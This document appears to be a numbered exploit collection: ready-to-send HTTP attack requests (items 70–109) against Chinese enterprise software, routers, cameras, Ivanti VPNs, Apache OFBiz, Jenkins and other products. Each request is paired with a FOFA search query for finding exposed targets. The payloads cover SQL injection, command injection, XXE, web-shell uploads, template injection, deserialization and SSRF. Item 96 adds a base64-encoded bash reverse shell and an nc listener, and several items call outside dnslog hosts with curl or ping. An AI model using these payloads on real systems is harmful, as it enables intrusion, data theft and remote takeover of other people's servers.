GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QiAnXin Legendsec (网神) SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Legendsec (网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
    <params>
      <param>
      <value>
        <struct>
       <member>
          <name>test</name>
          <value>
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
          </value>
        </member>
      </struct>
      </value>
    </param>
    </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of an XML document; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

